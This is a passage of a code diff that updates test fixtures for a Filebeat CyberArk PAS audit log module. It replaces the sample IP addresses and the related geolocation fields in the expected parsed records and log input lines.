+        "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143",
         "cyberarkpas.audit.ca_properties.policy_id": "WinDomain",
         "cyberarkpas.audit.ca_properties.reset_immediately": "ReconcileTask",
         "cyberarkpas.audit.ca_properties.retries_count": "4",
         "cyberarkpas.audit.ca_properties.user_name": "ELASTIC\\bart",
         "cyberarkpas.audit.desc": "CPM Reconcile Password Failed",
-        "cyberarkpas.audit.extra_details.other.address": "34.66.114.180",
+        "cyberarkpas.audit.extra_details.other.address": "81.2.69.143",
         "cyberarkpas.audit.extra_details.other.retriescount": "4",
         "cyberarkpas.audit.extra_details.username": "ELASTIC\\bart",
-        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart",
+        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T10:12:18Z",
         "cyberarkpas.audit.issuer": "PasswordManager",
         "cyberarkpas.audit.message": "CPM Reconcile Password Failed",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:12:18</Timestamp>\n    <IsoTimestamp>2021-03-15T10:12:18Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=34.66.114.180;retriescount=4;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"4\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615803137\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
-        "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:12:18</Timestamp>\n    <IsoTimestamp>2021-03-15T10:12:18Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=81.2.69.143;retriescount=4;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"4\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615803137\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Error",
         "cyberarkpas.audit.station": "10.0.1.20",
         "cyberarkpas.audit.timestamp": "Mar 15 03:12:18",
-        "destination.address": "34.66.114.180",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.6583,
-        "destination.geo.location.lon": -77.2481,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
-        "destination.ip": "34.66.114.180",
+        "destination.address": "81.2.69.143",
+        "destination.geo.city_name": "London",
+        "destination.geo.continent_name": "Europe",
+        "destination.geo.country_iso_code": "GB",
+        "destination.geo.country_name": "United Kingdom",
+        "destination.geo.location.lat": 51.5142,
+        "destination.geo.location.lon": -0.0931,
+        "destination.geo.region_iso_code": "GB-ENG",
+        "destination.geo.region_name": "England",
+        "destination.ip": "81.2.69.143",
         "event.action": "cpm reconcile password failed",
         "event.category": [
             "iam"
@@ -390,11 +389,11 @@
             "error",
             "user"
         ],
-        "file.path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart",
+        "file.path": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart",
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 15847,
+        "log.offset": 15799,
         "log.syslog.priority": "7",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -403,7 +402,7 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "10.0.1.20",
-            "34.66.114.180"
+            "81.2.69.143"
         ],
         "related.user": [
             "ELASTIC\\bart",
@@ -449,11 +448,6 @@
         "cyberarkpas.audit.station": "10.0.1.20",
         "cyberarkpas.audit.timestamp": "Mar 15 03:12:19",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "event.action": "cpm reconcile password failed",
         "event.category": [
@@ -476,7 +470,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 19810,
+        "log.offset": 19746,
         "log.syslog.priority": "7",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -504,7 +498,7 @@
     {
         "@timestamp": "2021-03-15T12:57:13.000Z",
         "cyberarkpas.audit.action": "CPM Reconcile Password Failed",
-        "cyberarkpas.audit.ca_properties.address": "34.66.114.180",
+        "cyberarkpas.audit.ca_properties.address": "81.2.69.143",
         "cyberarkpas.audit.ca_properties.cpm_disabled": "(CPM)MaxRetries",
         "cyberarkpas.audit.ca_properties.cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined",
         "cyberarkpas.audit.ca_properties.cpm_status": "failure",
@@ -512,35 +506,36 @@
         "cyberarkpas.audit.ca_properties.device_type": "Operating System",
         "cyberarkpas.audit.ca_properties.last_fail_date": "1615813031",
         "cyberarkpas.audit.ca_properties.last_task": "ReconcileTask",
-        "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180",
+        "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143",
         "cyberarkpas.audit.ca_properties.policy_id": "WinDomain",
         "cyberarkpas.audit.ca_properties.reset_immediately": "ReconcileTask",
         "cyberarkpas.audit.ca_properties.retries_count": "5",
         "cyberarkpas.audit.ca_properties.user_name": "ELASTIC\\bart",
         "cyberarkpas.audit.desc": "CPM Reconcile Password Failed",
-        "cyberarkpas.audit.extra_details.other.address": "34.66.114.180",
+        "cyberarkpas.audit.extra_details.other.address": "81.2.69.143",
         "cyberarkpas.audit.extra_details.other.retriescount": "5",
         "cyberarkpas.audit.extra_details.username": "ELASTIC\\bart",
-        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart",
+        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T12:57:13Z",
         "cyberarkpas.audit.issuer": "PasswordManager",
         "cyberarkpas.audit.message": "CPM Reconcile Password Failed",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 05:57:13</Timestamp>\n    <IsoTimestamp>2021-03-15T12:57:13Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"CPMDisabled\" Value=\"(CPM)MaxRetries\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"5\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615813031\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
-        "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 05:57:13</Timestamp>\n    <IsoTimestamp>2021-03-15T12:57:13Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=81.2.69.143;retriescount=5;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"CPMDisabled\" Value=\"(CPM)MaxRetries\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"5\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615813031\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Error",
         "cyberarkpas.audit.station": "10.0.1.20",
         "cyberarkpas.audit.timestamp": "Mar 15 05:57:13",
-        "destination.address": "34.66.114.180",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.6583,
-        "destination.geo.location.lon": -77.2481,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
-        "destination.ip": "34.66.114.180",
+        "destination.address": "81.2.69.143",
+        "destination.geo.city_name": "London",
+        "destination.geo.continent_name": "Europe",
+        "destination.geo.country_iso_code": "GB",
+        "destination.geo.country_name": "United Kingdom",
+        "destination.geo.location.lat": 51.5142,
+        "destination.geo.location.lon": -0.0931,
+        "destination.geo.region_iso_code": "GB-ENG",
+        "destination.geo.region_name": "England",
+        "destination.ip": "81.2.69.143",
         "event.action": "cpm reconcile password failed",
         "event.category": [
             "iam"
@@ -558,11 +553,11 @@
             "error",
             "user"
         ],
-        "file.path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart",
+        "file.path": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart",
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 23876,
+        "log.offset": 23812,
         "log.syslog.priority": "7",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -571,7 +566,7 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "10.0.1.20",
-            "34.66.114.180"
+            "81.2.69.143"
         ],
         "related.user": [
             "ELASTIC\\bart",
@@ -617,11 +612,6 @@
         "cyberarkpas.audit.station": "10.0.1.20",
         "cyberarkpas.audit.timestamp": "Mar 15 06:04:27",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "event.action": "cpm reconcile password failed",
         "event.category": [
@@ -644,7 +634,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 27968,
+        "log.offset": 27888,
         "log.syslog.priority": "7",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -701,11 +691,6 @@
         "cyberarkpas.audit.station": "10.0.1.20",
         "cyberarkpas.audit.timestamp": "Mar 15 07:44:37",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "event.action": "cpm reconcile password failed",
         "event.category": [
@@ -728,7 +713,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 32131,
+        "log.offset": 32051,
         "log.syslog.priority": "7",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/62_create_file_version.log b/x-pack/filebeat/module/cyberarkpas/audit/test/62_create_file_version.log
index 0d2f4d0e96ee..6569ebcaa91a 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/62_create_file_version.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/62_create_file_version.log
@@ -1,8 +1,8 @@
-<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}}
-<5>1 2021-03-10T17:58:05Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:05","IsoTimestamp":"2021-03-10T17:58:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"Administrator","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMNotifications","File":"Root\\SessionControl","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}}
-<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}}
-<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}}
+<5>1 2021-03-10T17:58:05Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:05","IsoTimestamp":"2021-03-10T17:58:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"Administrator","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMNotifications","File":"Root\\SessionControl","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}}
+<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}}
+<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}}
 <5>1 2021-03-11T16:50:29Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:50:29</Timestamp>\n    <IsoTimestamp>2021-03-11T16:50:29Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>62</MessageID>\n    <Desc>Create File Version</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PVWAAppUser</Issuer>\n    <Action>Create File Version</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMSessions</Safe>\n    <File>Root\\ec7c3e3bd11069dd20a491a6b11bbe293bf4780b</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Create File Version</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:50:29","IsoTimestamp":"2021-03-11T16:50:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PVWAAppUser","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMSessions","File":"Root\\ec7c3e3bd11069dd20a491a6b11bbe293bf4780b","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}}
-<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:58</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:58Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>62</MessageID>\n    <Desc>Create File Version</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Create File Version</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMPLiveSessions</Safe>\n    <File>Root\\PSMPApp_VAGRANT.LiveSessions</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Create File Version</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}}
+<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:58</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:58Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>62</MessageID>\n    <Desc>Create File Version</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Create File Version</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMPLiveSessions</Safe>\n    <File>Root\\PSMPApp_VAGRANT.LiveSessions</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Create File Version</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Create File 